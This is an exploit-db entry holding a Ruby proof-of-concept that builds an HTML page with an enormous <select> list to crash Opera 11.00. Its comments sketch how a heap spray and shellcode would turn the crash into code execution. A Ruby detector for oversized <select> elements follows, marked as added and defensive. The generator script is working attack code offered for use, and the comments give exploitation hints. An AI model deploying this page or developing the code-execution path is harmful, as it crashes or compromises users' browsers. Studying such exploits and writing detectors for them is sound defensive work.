Opera Web Browser 11.00 – Integer Overflow

  • Author: C4SS!0 G0M3S
    Date: 2011-01-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/16042/
    #
    #
    #[+]Exploit Title: Exploit Integer Overflow Opera Web Browser 11.00
    #[+]Date: 24\01\2011
    #[+]Author: C4SS!0 G0M3S
    #[+]Software Link: http://get12.opera.com/pub/opera/win/1100/int/Opera_1100_int_Setup.exe
    #[+]Version: 11.00
    #[+]Tested On: WIN-XP SP3 PORTUGUESE BRAZILIAN
    #[+]CVE: N/A
    #
    #
    #
    #Note:
    #This exploit is only a Denial of Service in Opera web browser
    #I created a poc using heap spray that allows code execution
    #but I will not post here because it can be used for evil
    #And I do not want that.
    # for you to explore the program you control with the number esi childrens then created using a spray heap address any such
    #0a0a0a0a the data in address should be the point to the beginning of the shellcode
    #0a0a0a0a => \x90\x90\x90 => and your shellcode
    #Then the function mov eax, [esi] places the value in eax then the program call eax and boom run shellcode !!!!!
    #
    #
    #
    
    
    
    
    print "[*]Creating the Exploit\n"
    i = 0
    buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n" 
    
    while i < 0x4141
      buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
      i += 1
    end
    
    HTML =
    "<html>\n"+
    "<body>\n\n"+
    "<select>\n\n"
    
    HTML+=buf * 100
    HTML += "\n\n\n</select>\n\n"+
    "</body>\n\n\n"+
    "</html>\n\n\n\n\n"
    
    f = File.open("Exploit_opera_11.00.html","w")
    f.puts HTML
    f.close
    puts "\n\n[*]File Created With Sucess"
    sleep(1)
    puts "[*]Go to my Site www.invasao.com.br!"
    sleep(1)
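
A defensive counterpart to the generator above, as an added example that is not part of the original exploit-db entry: the script writes a single `<select>` holding roughly 1.67 million `<option>` children, so this streaming Ruby check counts options per `<select>` and reports any count above a limit. The function name, the `THRESHOLD` value and the `SAMPLE` input are assumptions made for the illustration.

```ruby
# Added example, not part of the original PoC.
require "stringio"

THRESHOLD = 100_000      # assumed limit; tune to what your own pages really use
CHUNK     = 64 * 1024    # read size, so multi-megabyte files stay cheap to scan
TAG_RE    = /<(\/?)(select|option)\b/i

# Returns the <option> count of every <select> in io that exceeds limit.
def oversized_selects(io, limit: THRESHOLD)
  hits, stack, tail = [], [], ""   # stack: one counter per open <select>
  loop do
    chunk = io.read(CHUNK)
    data  = tail + chunk.to_s
    # Hold back an unterminated trailing tag so it is matched whole next round.
    cut = chunk && data.rindex("<")
    if cut && !data.index(">", cut)
      tail, data = data[cut..-1], data[0...cut]
    else
      tail = ""
    end
    data.scan(TAG_RE) do |close, name|
      if name.downcase == "select"
        if close.empty?
          stack.push(0)
        elsif (n = stack.pop) && n > limit
          hits << n
        end
      elsif close.empty? && !stack.empty?
        stack[-1] += 1
      end
    end
    break if chunk.nil?
  end
  stack.each { |n| hits << n if n > limit }  # <select> still open at EOF
  hits
end

# Constructed sample: one ordinary <select> and one with 5,000 options.
SAMPLE = "<select><option>a</option></select>" \
         "<SELECT>" + "<option>x</option>" * 5_000 + "</SELECT>"

if __FILE__ == $0
  p oversized_selects(StringIO.new(SAMPLE), limit: 1_000)
  ARGV.each do |path|
    File.open(path, "rb") { |f| puts "#{path}: #{oversized_selects(f).inspect}" }
  end
end
```

This is a tag-counting heuristic for mail or proxy filtering, not an HTML parser: it does not skip comments or script bodies.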